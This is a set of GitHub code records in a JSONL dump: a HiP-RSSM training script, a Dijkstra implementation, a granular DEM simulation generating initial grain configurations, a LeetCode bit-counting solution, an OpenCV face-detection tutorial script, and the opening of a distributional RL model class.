## Initializing wandb object and sweep object\n wandb_run = wandb.init(project=cfg.wandb.project_name, name=expName,\n mode=mode) # wandb object has a set of configs associated with it as well\n\n ### Initialize Model Classes, Train and Inference Modules\n hiprssm_model = HipRSSM(obs_dim=train_obs.shape[-1], action_dim=train_act.shape[-1],\n target_dim=train_targets.shape[-1],\n config=cfg)\n\n\n hiprssm_learn = hiprssm_dyn_trainer.Learn(hiprssm_model, loss=cfg.learn.loss, imp=impu, config=cfg, run=wandb_run,\n log=cfg.wandb['log'])\n\n if cfg.learn.load == False:\n #### Train the Model\n hiprssm_learn.train(train_obs, train_act, train_targets, train_task_idx, cfg.learn.epochs, cfg.learn.batch_size,\n test_obs, test_act,\n test_targets, test_task_idx)\n\n\n\n\n ########################################## Inference And Testing Multi Step Ahead Predictions#################################################\n ##### Load best model\n model_at = wandb_run.use_artifact('saved_model' + ':latest')\n model_path = model_at.download() ###return the save durectory path in wandb local\n hiprssm_model.load_state_dict(torch.load(save_path))\n print('>>>>>>>>>>Loaded The Model From Local Folder<<<<<<<<<<<<<<<<<<<')\n\n ###### Inference\n\n ########## Initialize inference class\n hiprssm_infer = hiprssm_dyn_inference.Infer(hiprssm_model, 
normalizer=data.normalizer, config=cfg, run=wandb_run)\n batch_size = 2\n k = int(train_obs.shape[1] / 2)\n pred_mean, pred_var, gt, obs_valid, _, _, cur_obs = hiprssm_infer.predict(test_obs, test_act, test_targets, test_task_idx,\n imp=impu, k=k,\n test_gt_known=True, batch_size=batch_size, tar=tar_type)\n print(pred_mean.shape, pred_var.shape, gt.shape, obs_valid.shape)\n\n\n\n rmse_next_state, pred_obs, gt_obs = root_mean_squared(pred_mean, gt, data.normalizer,\n tar=\"observations\", denorma=True)\n wandb_run.summary['rmse_denorma_next_state'] = rmse_next_state\n\n print(\"Root mean square Error is:\", rmse_next_state)\n\n\n multiSteps = [1,50, 100, 120]\n for step in multiSteps:\n pred_mean, pred_var, gt_multi = hiprssm_infer.predict_mbrl(test_obs, test_act, test_targets, k=k,\n batch_size=batch_size,\n multiStep=step, tar=tar_type)\n\n rmse_next_state, pred_obs, gt_obs = root_mean_squared(pred_mean, gt_multi, data.normalizer, tar=\"observations\", denorma=True)\n print(step,\"Step Ahead Prediction RMSE:\",rmse_next_state)\n wandb_run.summary['rmse_multi_step_' + str(step)] = rmse_next_state\n\n\ndef main():\n my_app()\n\n\n\n## https://stackoverflow.com/questions/32761999/how-to-pass-an-entire-list-as-command-line-argument-in-python/32763023\nif __name__ == '__main__':\n main()","repo_name":"ALRhub/HiP-RSSM","sub_path":"experiments/mobileRobot/mobile_robot_hiprssm.py","file_name":"mobile_robot_hiprssm.py","file_ext":"py","file_size_in_byte":5722,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"41171787748","text":"import math\nclass EstadoVertice:\n def __init__(self) -> None:\n self.ultimo = 0\n self.distancia = 0.0\n\nclass Dijkstra:\n def __init__(self) -> None:\n self.INFINITO = math.inf\n self.N = 5\n self.F = [0 for i in range(self.N)]\n\n def minimo(self, F, D, n):\n v = 0\n mx = self.INFINITO\n j = 1\n while j < n:\n if not(F[j]) and (mx >= D[j].distancia):\n mx = D[j].distancia\n v = j\n j += 1\n return v\n \n def caminiMinimo(self,D, MatPesos, n):\n s = 0\n self.F[s] = 1\n i = 1\n while i< n:\n self.F[i] = 0\n D[i].distancia = MatPesos[0][i]\n D[i].ultimo = 0\n i+=1\n i = 1\n while i< n:\n v=self.minimo(self.F, D, n)\n self.F[v] = 1\n w = 1\n while w 0 :\n #unlinear stiffness\n G_eq = 1/((1-self.g1.nu)/self.g1.g+(1-self.g2.nu)/self.g2.g)\n R_eq = 1/(1/self.g1.radius+1/self.g2.radius)\n kt0 = 8 * G_eq *math.sqrt(R_eq*abs(self.overlap))\n kt = kt0*math.sqrt(max(1-2/3*kt0*abs(self.overlap_tangential)/self.mu/abs(self.F12_n),0))\n self.kt = kt\n\n t12 = np.array([-self.n12[1], self.n12[0]])\n self.t12 = t12\n if self.tangential_old_statut:\n #if a reaction has been already computed\n #need to project the tangential reaction on the new tangential plane\n self.ft = self.ft*np.dot(self.t12_old,self.t12)\n else:\n self.tangential_old_statut = True\n Delta_Us = np.dot(self.g1.v-self.g2.v,self.t12) * dt_DEM\n self.overlap_tangential = self.overlap_tangential + Delta_Us\n self.ft = self.ft - self.kt*Delta_Us\n self.t12_old = self.t12\n if abs(self.ft) > abs(self.mu*self.F12_n) or kt == 0: #Coulomb criteria\n self.ft = self.mu * abs(self.F12_n) * np.sign(self.ft)\n F12 = -self.ft*t12\n self.g1.add_F(-F12)\n self.g2.add_F( F12)\n #damping\n gamma = -math.log(self.coeff_restitution)/math.sqrt(math.pi**2+math.log(self.coeff_restitution)**2)\n mass_eq = self.g1.mass*self.g2.mass/(self.g1.mass+self.g2.mass)\n eta = 2 * gamma * math.sqrt(mass_eq*kt)\n F12_damp = -np.dot(self.g2.v - self.g1.v,t12)*eta/2*t12\n 
self.g1.add_F(-F12_damp)\n                self.g2.add_F( F12_damp)\n            else :\n                self.kt = 0\n                self.t12 = np.array([-self.n12[1], self.n12[0]])\n\n        elif self.nature == 'gwy_min':\n            if self.mu > 0 :\n                #unlinear stiffness\n                twg = np.array([-1, 0])\n                self.twg = twg\n                Delta_Us = np.dot(self.g.v,self.twg) * dt_DEM\n                self.overlap_tangential = self.overlap_tangential + Delta_Us\n                self.ft = self.ft - self.kt*Delta_Us\n                if abs(self.ft) > abs(self.mu*self.Fwg_n) : #Coulomb criteria\n                    self.ft = self.mu * abs(self.Fwg_n) * np.sign(self.ft)\n                Fwg = self.ft*twg\n                self.g.add_F(Fwg)\n            else :\n                twg = np.array([-1, 0])\n                self.twg = twg\n\n        elif self.nature == 'gwy_max':\n            if self.mu > 0 :\n                #unlinear stiffness\n                twg = np.array([1, 0])\n                self.twg = twg\n                Delta_Us = np.dot(self.g.v,self.twg) * dt_DEM\n                self.overlap_tangential = self.overlap_tangential + Delta_Us\n                self.ft = self.ft - self.kt*Delta_Us\n                if abs(self.ft) > abs(self.mu*self.Fwg_n) : #Coulomb criteria\n                    self.ft = self.mu * abs(self.Fwg_n) * np.sign(self.ft)\n                Fwg = self.ft*twg\n                self.g.add_F(Fwg)\n            else :\n                twg = np.array([1, 0])\n                self.twg = twg\n\n        elif self.nature == 'gwx_min':\n            if self.mu > 0 :\n                #unlinear stiffness\n                twg = np.array([0, 1])\n                self.twg = twg\n                Delta_Us = np.dot(self.g.v,self.twg) * dt_DEM\n                self.overlap_tangential = self.overlap_tangential + Delta_Us\n                self.ft = self.ft - self.kt*Delta_Us\n                if abs(self.ft) > abs(self.mu*self.Fwg_n) : #Coulomb criteria\n                    self.ft = self.mu * abs(self.Fwg_n) * np.sign(self.ft)\n                Fwg = self.ft*twg\n                self.g.add_F(Fwg)\n            else :\n                twg = np.array([0, 1])\n                self.twg = twg\n\n        elif self.nature == 'gwx_max':\n            if self.mu > 0 :\n                #unlinear stiffness\n                twg = np.array([0, -1])\n                self.twg = twg\n                Delta_Us = np.dot(self.g.v,self.twg) * dt_DEM\n                self.overlap_tangential = self.overlap_tangential + Delta_Us\n                self.ft = self.ft - self.kt*Delta_Us\n                if abs(self.ft) > abs(self.mu*self.Fwg_n) : #Coulomb criteria\n                    self.ft = self.mu * abs(self.Fwg_n) * np.sign(self.ft)\n                Fwg = self.ft*twg\n                self.g.add_F(Fwg)\n            else :\n                twg = np.array([0, -1])\n                self.twg = twg\n\n#-------------------------------------------------------------------------------\n#Function Definition\n#-------------------------------------------------------------------------------\n\ndef LG_tempo(dict_algorithm, dict_geometry, dict_ic, dict_material, dict_sample, dict_sollicitations, simulation_report):\n    '''create an initial condition with disk grains'''\n    #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n    #load data needed\n    n_generation = dict_ic['n_generation']\n    if n_generation != 2:\n        simulation_report.write('n_generation must be equal to 2 !')\n        raise ValueError('n_generation must be equal to 2 !')\n    factor = dict_ic['factor_ymax_box']\n    N_grain = dict_geometry['N_grain_disk']\n    L_radius = dict_geometry['L_R']\n    L_percentage_radius = dict_geometry['L_percentage_R']\n    x_min = dict_sample['x_box_min']\n    x_max = dict_sample['x_box_max']\n    #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n\n    #define the y_max for the grains generation\n    radius_mean = 0\n    for i in range(len(L_radius)):\n        radius_mean = radius_mean + L_radius[i]*L_percentage_radius[i]\n    dy_creation = N_grain / n_generation * factor*(2*radius_mean)**2/(x_max-x_min)\n\n    #plan the grains generation\n    L_n_grain_radius_try_one = []\n    L_n_grain_radius = []\n    L_n_grain_radius_done = []\n    for percentage in L_percentage_radius:\n        L_n_grain_radius_try_one.append(int(N_grain*percentage/n_generation))\n        L_n_grain_radius.append(int(N_grain*percentage))\n        
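#counter of grains already generated for each radius class\n        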
L_n_grain_radius_done.append(0)\n\n    #Creation of grains\n    #grain generation is decomposed into several steps (creation of grains, then settlement)\n    i_DEM = 0\n    L_L_g_tempo = []\n\n    #---------------------------------------------------------------------------\n\n    print('First generation of grains')\n    L_g_tempo = []\n\n    #add elements in dicts\n    dict_ic['L_g_tempo'] = L_g_tempo\n    dict_ic['L_L_g_tempo'] = L_L_g_tempo\n    dict_ic['i_DEM_IC'] = i_DEM\n    dict_ic['L_n_grain_radius_try_one'] = L_n_grain_radius_try_one\n    dict_ic['L_n_grain_radius'] = L_n_grain_radius\n    dict_ic['L_n_grain_radius_done'] = L_n_grain_radius_done\n    dict_sample['y_box_min_ic'] = dict_sample['y_box_min']\n    dict_sample['dy_creation'] = dy_creation\n\n    Create_grains(dict_ic, dict_geometry, dict_sample, dict_material, 1, simulation_report)\n\n    #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n    #load data needed\n    L_g_tempo = dict_ic['L_g_tempo']\n    #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n\n    #DEM to find the steady-state configuration after loading\n    #find the maximum y (center+radius)\n    y_max = dict_sample['y_box_min_ic']\n    for grain in L_g_tempo:\n        if grain.center[1]+grain.radius > y_max:\n            y_max = grain.center[1]+grain.radius\n\n    #add element in dict\n    dict_sample['y_box_max'] = y_max\n\n    DEM_loading(dict_ic, dict_material, dict_sample, dict_sollicitations, False, simulation_report)\n\n    #---------------------------------------------------------------------------\n\n    print('Second generation of grains')\n    L_g_tempo = []\n\n    #update elements in dict\n    dict_ic['L_g_tempo'] = L_g_tempo\n    dict_sample['y_box_min_ic'] = dict_sample['y_box_max']\n\n    Create_grains(dict_ic, dict_geometry, dict_sample, dict_material, 2, simulation_report)\n\n    #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n    #load data needed\n    L_g_tempo = dict_ic['L_g_tempo']\n    #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n\n    #DEM to find the steady-state configuration after loading\n    #find the maximum y (center+radius)\n    y_max = dict_sample['y_box_min_ic']\n    for grain in L_g_tempo:\n        if grain.center[1]+grain.radius > y_max:\n            y_max = grain.center[1]+grain.radius\n\n    #update element in dict\n    dict_sample['y_box_max'] = y_max\n\n    DEM_loading(dict_ic, dict_material, dict_sample, dict_sollicitations, False, simulation_report)\n\n    #---------------------------------------------------------------------------\n\n    print('Combine generations of grains')\n\n    #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n    #load data needed\n    L_L_g_tempo = dict_ic['L_L_g_tempo']\n    #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n\n    #combine all smaller samples\n    L_g = []\n    for L_g_tempo in L_L_g_tempo:\n        for g_tempo in L_g_tempo:\n            L_g.append(g_tempo)\n\n    #update element in dict\n    dict_ic['L_g_tempo'] = L_g\n\n    DEM_loading(dict_ic, dict_material, dict_sample, dict_sollicitations, True, simulation_report)\n\n    #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n    #load data needed\n    L_g_tempo = dict_ic['L_g_tempo']\n    #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n\n    simulation_report.write_and_print(str(len(L_g_tempo))+' / '+str(N_grain)+' grains have been created\\n','\\n'+str(len(L_g_tempo))+' / '+str(N_grain)+' grains have been created\\n')\n\n    return L_g_tempo, 
y_max\n\n#-------------------------------------------------------------------------------\n\ndef DEM_loading(dict_ic, dict_material, dict_sample, dict_sollicitations, multi_generation, simulation_report):\n '''loading the granular system'''\n #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n #load data needed\n L_g_tempo = dict_ic['L_g_tempo']\n dt_DEM = dict_ic['dt_DEM_IC']\n i_DEM_stop = dict_ic['i_DEM_stop_IC']\n i_DEM = dict_ic['i_DEM_IC']\n Ecin_ratio_IC = dict_ic['Ecin_ratio_IC']\n i_print_plot_IC = dict_ic['i_print_plot_IC']\n factor_neighborhood_IC = dict_ic['factor_neighborhood_IC']\n if multi_generation :\n i_update_neighborhoods = dict_ic['i_update_neighborhoods_com']\n y_min = dict_sample['y_box_min']\n else :\n i_update_neighborhoods = dict_ic['i_update_neighborhoods_gen']\n y_min = dict_sample['y_box_min_ic']\n mu_gg = 0\n mu_gw = 0\n e_gg = dict_material['coeff_restitution']\n e_gw = dict_material['coeff_restitution']\n x_min = dict_sample['x_box_min']\n x_max = dict_sample['x_box_max']\n y_max = dict_sample['y_box_max']\n Forcev_target = dict_sollicitations['Vertical_Confinement_Force']\n gravity = dict_sollicitations['gravity']\n #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n\n\n i_DEM_0 = i_DEM\n DEM_loop_statut = True\n\n #Initialisation\n L_contact_gg = []\n L_contact_ij = []\n L_contact_gw = []\n L_contact_gw_ij = []\n id_contact = 0\n\n #trackers and stop conditions\n if gravity > 0:\n Force_stop = 0\n for grain in L_g_tempo:\n Force_stop = Force_stop + 0.8*grain.mass*gravity\n\n Force_tracker = []\n Ecin_tracker = []\n Ecin_stop = 0\n Ymax_tracker = []\n for grain in L_g_tempo:\n Ecin_stop = Ecin_stop + 0.5*grain.mass*(Ecin_ratio_IC*grain.radius/dt_DEM)**2\n\n while DEM_loop_statut :\n\n i_DEM = i_DEM + 1\n\n #Contact detection\n if (i_DEM-i_DEM_0-1) % i_update_neighborhoods == 0:\n Update_Neighborhoods(dict_ic)\n L_contact_gg, L_contact_ij, id_contact = Grains_Disk_contact_Neighborhoods(L_g_tempo,L_contact_gg,L_contact_ij,id_contact,mu_gg,e_gg)\n # Detection of contacts between grain and walls\n if (i_DEM-i_DEM_0-1) % i_update_neighborhoods == 0:\n wall_neighborhood = Update_wall_Neighborhoods(L_g_tempo,factor_neighborhood_IC,x_min,x_max,y_min,y_max)\n L_contact_gw, L_contact_gw_ij, id_contact = Grains_Disk_Wall_contact_Neighborhood(wall_neighborhood,L_contact_gw,L_contact_gw_ij,id_contact,x_min,x_max,y_min,y_max,mu_gw,e_gw)\n\n #Sollicitation computation\n for grain in L_g_tempo:\n grain.init_F_control(gravity)\n for contact in L_contact_gg+L_contact_gw:\n contact.normal()\n contact.tangential(dt_DEM)\n\n #Move grains\n for grain in L_g_tempo :\n grain.euler_semi_implicite(dt_DEM)\n\n #check if some grains are outside of the study box\n L_ig_to_delete = []\n for id_grain in range(len(L_g_tempo)):\n if L_g_tempo[id_grain].center[0] < x_min :\n L_ig_to_delete.append(id_grain)\n elif L_g_tempo[id_grain].center[0] > x_max :\n L_ig_to_delete.append(id_grain)\n elif L_g_tempo[id_grain].center[1] < y_min :\n L_ig_to_delete.append(id_grain)\n elif L_g_tempo[id_grain].center[1] > y_max :\n L_ig_to_delete.append(id_grain)\n L_ig_to_delete.reverse()\n for id_grain in L_ig_to_delete:\n simulation_report.write_and_print('Grain '+str(L_g_tempo[id_grain].id)+' has been deleted because it is out of the box\\n','Grain '+str(L_g_tempo[id_grain].id)+' has been deleted because it is out of the box')\n L_g_tempo.pop(id_grain)\n\n #Control the y_max to have the pressure target\n y_max, Fv = 
Control_y_max_NR(y_max,Forcev_target,L_contact_gw,L_g_tempo)\n\n        #Tracker\n        F = F_total(L_g_tempo)\n        Ecin = E_cin_total(L_g_tempo)\n        Force_tracker.append(F)\n        Ecin_tracker.append(Ecin)\n        Ymax_tracker.append(y_max)\n\n        if i_DEM % i_print_plot_IC == 0:\n            if gravity > 0 :\n                print('i_DEM',i_DEM,'and Ecin',int(100*Ecin/Ecin_stop),'% and Force',int(100*F/Force_stop),'% and Confinement',int(100*Fv/Forcev_target),'%')\n            else:\n                print('i_DEM',i_DEM,'and Ecin',int(100*Ecin/Ecin_stop),'% and Confinement',int(100*Fv/Forcev_target),'%')\n            if dict_ic['Debug_DEM']:\n                Plot_Config_Loaded(L_g_tempo,x_min,x_max,y_min,y_max,i_DEM)\n\n        #Check stop conditions for DEM\n        if i_DEM >= i_DEM_stop + i_DEM_0:\n            DEM_loop_statut = False\n        if gravity > 0 :\n            if Ecin < Ecin_stop and F < Force_stop and (0.95*Forcev_target<Fv and Fv<1.05*Forcev_target):\n                DEM_loop_statut = False\n        else:\n            if Ecin < Ecin_stop and i_DEM >= i_DEM_stop*0.1 + i_DEM_0 and (0.95*Forcev_target<Fv and Fv<1.05*Forcev_target):\n                DEM_loop_statut = False\n 100: #Maximum try\n            ite_criteria = False\n        if -0.01*Force_target y_max:\n                    y_max = y_max_grain\n                    id_grain_max = id_grain\n            elif y_max == None:\n                y_max = y_max_grain\n                id_grain_max = id_grain\n\n    factor = 5\n    k = factor*4/3*L_g[id_grain_max].y/(1-L_g[id_grain_max].nu*L_g[id_grain_max].nu)*math.sqrt(L_g[id_grain_max].radius)\n    y_max = y_max - (Force/k)**(2/3)\n\n    return y_max\n\n#-------------------------------------------------------------------------------\n\ndef Update_Neighborhoods(dict_ic):\n    '''\n    determine a neighborhood for each grain. This function is called every x time steps\n\n    grain contact is determined by Grains_Polyhedral_contact_Neighborhoods()\n    notice that if there is a potential contact between grain_i and grain_j\n    grain_i is not in the neighborhood of grain_j\n    whereas grain_j is in the neighborhood of grain_i\n    with i_grain < j_grain\n    '''\n    #factor determines the size of the neighborhood window\n    #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n    #load data needed\n    L_g = dict_ic['L_g_tempo']\n    factor = dict_ic['factor_neighborhood_IC']\n    #-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.\n\n    for i_grain in range(len(L_g)-1) :\n        neighborhood = []\n        for j_grain in range(i_grain+1,len(L_g)):\n            if np.linalg.norm(L_g[i_grain].center-L_g[j_grain].center) < factor*(L_g[i_grain].radius+L_g[j_grain].radius):\n                neighborhood.append(L_g[j_grain])\n        L_g[i_grain].neighbourood = neighborhood\n\n    #Update dict\n    dict_ic['L_g_tempo'] = L_g\n\n#-------------------------------------------------------------------------------\n\ndef Grains_Disk_contact_Neighborhoods(L_g,L_contact,L_ij_contact,id_contact,mu_gg,e_gg):\n    '''\n    detect contact between a grain and grains from its neighborhood\n\n    the neighborhood is updated with Update_Neighborhoods()\n    '''\n    for i_grain in range(len(L_g)-1) :\n        grain_i = L_g[i_grain]\n        for neighbour in L_g[i_grain].neighbourood:\n            grain_j = neighbour\n            j_grain = neighbour.id\n            if Intersection(grain_i,grain_j):\n                if (i_grain,j_grain) not in L_ij_contact: #contact not detected previously\n                   #creation of contact\n                   L_ij_contact.append((i_grain,j_grain))\n                   L_contact.append(Contact_Tempo(id_contact, grain_i, mu_gg, e_gg, 'gg', grain_j))\n                   id_contact = id_contact + 1\n\n            else :\n                if (i_grain,j_grain) in L_ij_contact : #contact detected previously is not anymore\n                   L_contact.pop(L_ij_contact.index((i_grain,j_grain)))\n                   L_ij_contact.remove((i_grain,j_grain))\n\n    return L_contact, L_ij_contact, id_contact\n\n#-------------------------------------------------------------------------------\n\ndef Update_wall_Neighborhoods(L_g,factor,x_min,x_max,y_min,y_max):\n    '''\n    determine a 
neighborhood for the walls. This function is called every x time steps\n\n    grain_wall contact is determined by Grains_Polyhedral_Wall_contact_Neighborhood\n    '''\n    #factor determines the size of the neighborhood window\n    wall_neighborhood = []\n    for grain in L_g:\n\n        p_x_min = grain.center[0]-grain.radius\n        p_x_max = grain.center[0]+grain.radius\n        p_y_min = grain.center[1]-grain.radius\n        p_y_max = grain.center[1]+grain.radius\n\n        #grain-wall x_min\n        if abs(p_x_min-x_min) < factor*grain.radius :\n            wall_neighborhood.append(grain)\n        #grain-wall x_max\n        if abs(p_x_max-x_max) < factor*grain.radius :\n            wall_neighborhood.append(grain)\n        #grain-wall y_min\n        if abs(p_y_min-y_min) < factor*grain.radius :\n            wall_neighborhood.append(grain)\n        #grain-wall y_max\n        if abs(p_y_max-y_max) < factor*grain.radius :\n            wall_neighborhood.append(grain)\n\n    return wall_neighborhood\n\n#-------------------------------------------------------------------------------\n\ndef Grains_Disk_Wall_contact_Neighborhood(wall_neighborhood,L_contact_gw,L_contact_gw_ij,id_contact,x_min,x_max,y_min,y_max,mu_gw,e_gw):\n    '''\n    detect contact between grains in the wall neighborhood and the walls\n\n    the neighborhood is updated with Update_wall_Neighborhoods()\n    we iterate over the grain list and compare with the coordinates of the different walls\n    '''\n    for grain in wall_neighborhood:\n\n        # contact grain-wall x_min\n        if grain.center[0] < x_min + grain.radius and (grain.id,-1) not in L_contact_gw_ij:\n            L_contact_gw.append(Contact_Tempo(id_contact, grain, mu_gw, e_gw, 'gwx_min', None, x_min))\n            id_contact = id_contact + 1\n            L_contact_gw_ij.append((grain.id,-1))\n        elif grain.center[0] > x_min + grain.radius and (grain.id,-1) in L_contact_gw_ij:\n            i_contact = L_contact_gw_ij.index((grain.id,-1))\n            L_contact_gw.pop(i_contact)\n            L_contact_gw_ij.pop(i_contact)\n        # contact grain-wall x_max\n        if grain.center[0] > x_max - grain.radius and (grain.id,-2) not in L_contact_gw_ij:\n            L_contact_gw.append(Contact_Tempo(id_contact, grain, mu_gw, e_gw, 'gwx_max', None, x_max))\n            id_contact = id_contact + 1\n            L_contact_gw_ij.append((grain.id,-2))\n        elif grain.center[0] < x_max - grain.radius and (grain.id,-2) in L_contact_gw_ij:\n            i_contact = L_contact_gw_ij.index((grain.id,-2))\n            L_contact_gw.pop(i_contact)\n            L_contact_gw_ij.pop(i_contact)\n        # contact grain-wall y_min\n        if grain.center[1] < y_min + grain.radius and (grain.id,-3) not in L_contact_gw_ij:\n            L_contact_gw.append(Contact_Tempo(id_contact, grain, mu_gw, e_gw, 'gwy_min', None, y_min))\n            id_contact = id_contact + 1\n            L_contact_gw_ij.append((grain.id,-3))\n        elif grain.center[1] > y_min + grain.radius and (grain.id,-3) in L_contact_gw_ij:\n            i_contact = L_contact_gw_ij.index((grain.id,-3))\n            L_contact_gw.pop(i_contact)\n            L_contact_gw_ij.pop(i_contact)\n        # contact grain-wall y_max\n        if grain.center[1] > y_max - grain.radius and (grain.id,-4) not in L_contact_gw_ij:\n            L_contact_gw.append(Contact_Tempo(id_contact, grain, mu_gw, e_gw, 'gwy_max', None, y_max))\n            id_contact = id_contact + 1\n            L_contact_gw_ij.append((grain.id,-4))\n        elif grain.center[1] < y_max - grain.radius and (grain.id,-4) in L_contact_gw_ij:\n            i_contact = L_contact_gw_ij.index((grain.id,-4))\n            L_contact_gw.pop(i_contact)\n            L_contact_gw_ij.pop(i_contact)\n\n    return L_contact_gw, L_contact_gw_ij, id_contact\n\n#-------------------------------------------------------------------------------\n\ndef Plot_Trackers(Force_tracker, Ecin_tracker, Ymax_tracker, i_DEM):\n    '''plot trackers'''\n    plt.figure(1,figsize=(16,9))\n    plt.subplot(321)\n    
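#layout: left column shows the full history (vline marks 2/3), right column zooms on the final third\n    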
plt.plot(Force_tracker)\n plt.vlines(int(2/3*len(Force_tracker)),min(Force_tracker),max(Force_tracker))\n plt.title('Force total')\n plt.subplot(322)\n plt.plot(Force_tracker[int(2/3*len(Force_tracker)):])\n plt.title('End force total')\n plt.subplot(323)\n plt.plot(Ecin_tracker)\n plt.vlines(int(2/3*len(Ecin_tracker)),min(Ecin_tracker),max(Ecin_tracker))\n plt.title('Kinetic energy')\n plt.subplot(324)\n plt.plot(Ecin_tracker[int(2/3*len(Ecin_tracker)):])\n plt.title('End Kinetic energy')\n plt.subplot(325)\n plt.plot(Ymax_tracker)\n plt.vlines(int(2/3*len(Ymax_tracker)),min(Ymax_tracker),max(Ymax_tracker))\n plt.title('Upper wall position')\n plt.subplot(326)\n plt.plot(Ymax_tracker[int(2/3*len(Ymax_tracker)):])\n plt.title('End upper wall position')\n plt.savefig('Debug/DEM_ite/Init/Trackers_'+str(i_DEM)+'.png')\n plt.close(1)\n\n#-------------------------------------------------------------------------------\n\ndef From_LG_tempo_to_usable(dict_ic, dict_material, dict_sample):\n '''from a tempo configuration (circular grains), an initial configuration (circular grains) is generated'''\n L_g = []\n for grain_tempo in dict_ic['L_g_tempo']:\n\n #create real grain\n L_g.append(Grain.Grain(grain_tempo.id,grain_tempo.center,grain_tempo.radius,dict_material))\n\n #Add element in dict\n dict_sample['L_g'] = L_g\n\n#-------------------------------------------------------------------------------\n","repo_name":"AlexSacMorane/DEM_LookREVandRTS","sub_path":"Create_LG_IC.py","file_name":"Create_LG_IC.py","file_ext":"py","file_size_in_byte":37252,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30496312999","text":"class Solution(object):\r\n def countBits(self, num):\r\n \"\"\"\r\n :type num: int\r\n :rtype: List[int]\r\n \"\"\"\r\n ret = [0]\r\n pre_pow2 = 1\r\n for i in range(1, num+1):\r\n if not (i & (i-1)): # is power of 2\r\n ret.append(1)\r\n pre_pow2 = i\r\n else:\r\n ret.append(1 + ret[i-pre_pow2])\r\n return ret\r\n \"\"\"\r\n Note:\r\n we know that the power of two numbers represented as binary\r\n have only 1 bit-1 (e.g. 4 = 100, 16 = 1000). And for numbers\r\n in [2**(n), 2**(n+1)), this bit-1 will never be changed.\r\n so for the number (say, p) in this interval, we can count it as\r\n 1 + (# bit-1 in p-2**n). 
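That is, ret[p] = 1 + ret[p - 2**n].\r\n    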
For example, 7 = 4 + 3, and the binary\r\n    representation is 100 + 011, which is 1 + (# bit-1 in 3) = 1+2\r\n    \"\"\"","repo_name":"ycchhueannu/LeetCode","sub_path":"python/0338_Counting_Bits.py","file_name":"0338_Counting_Bits.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} {"seq_id":"36391738607","text":"import cv2 as cv\n\nimg = cv.imread('Photos/dwayne.jpg')\ncv.imshow('Group', img)\n\ngray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\ncv.imshow('gray robert', gray)\n\n\nhaar_cascade = cv.CascadeClassifier('haar_face.xml')\n# load the trained Haar cascade classifier from the XML file\n\nfaces_rect = haar_cascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=3)\n# rectangle coordinates of the detected faces\n\nprint(f'Number of faces found = {len(faces_rect)}')\nprint(faces_rect)\n\nfor (x,y,w,h) in faces_rect:\n    cv.rectangle(img, (x,y), (x+w, y+h), (0,255,0), thickness=2)\n\ncircle = cv.circle(img, (266, 95), 20, (255,0,0), 3)\ncv.imshow('circle', circle)\n\ncv.imshow('Detected Faces', img)\n\ncv.waitKey(0)","repo_name":"Yoshii-Sato/OpenCV","sub_path":"face_detect.py","file_name":"face_detect.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"70161618667","text":"# coding=utf-8\r\n\r\n###############################################################################\r\n################################### Imports ###################################\r\n###############################################################################\r\n\r\nimport torch\r\nimport torch.nn as nn\r\n# pylint: disable=E1101\r\n# pylint: disable=E1102\r\n\r\nfrom Models.FeedforwardDNN import FeedForwardDNN\r\nfrom Models.MonotonicNN import MonotonicNN\r\n\r\n\r\n\r\n###############################################################################\r\n############################### Class UMDQN_W_Model ###########################\r\n###############################################################################\r\n\r\nclass UMDQN_W_Model(nn.Module):\r\n    \"\"\"\r\n    GOAL: Implementing the DL model for the UMDQN-W distributional RL algorithm.\r\n    \r\n    VARIABLES: - stateEmbeddingDNN: State embedding part of the Deep Neural Network.\r\n               - UMNN: UMNN part of the Deep Neural Network.\r\n    \r\n    METHODS: - __init__: Initialization of the Deep Neural Network.\r\n             - forward: Forward pass of the Deep Neural Network.\r\n    \"\"\"\r\n\r\n    def __init__(self, numberOfInputs, numberOfOutputs,\r\n                 structureDNN, structureUMNN, stateEmbedding,\r\n                 numberOfSteps, device='cpu'):\r\n        